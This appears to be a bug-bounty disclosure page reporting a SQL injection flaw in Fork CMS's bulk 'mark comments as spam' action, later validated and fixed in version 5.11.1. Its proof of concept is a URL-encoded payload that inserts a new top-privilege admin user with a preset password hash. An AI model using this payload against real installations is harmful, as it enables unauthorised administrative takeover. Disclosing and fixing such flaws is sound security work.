SQL injection through marking blog comments on bulk as spam in forkcms/forkcms


Reported on

Mar 23rd 2022


the comments ids aren't checked and vulnerable for SQL injection

Proof of Concept[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=spam


This vulnerability is capable of injection sql

We are processing your report and will contact the forkcms team within 24 hours. a year ago
Jelmer Prins modified the report
a year ago
Jelmer Prins
a year ago


@admin found this one while writing fixes for other reported issues but it seems like I can't approve nor confirm it

Jamie Slome validated this vulnerability a year ago
Jelmer Prins has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome marked this as fixed in 5.11.1 with commit 6aca30 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation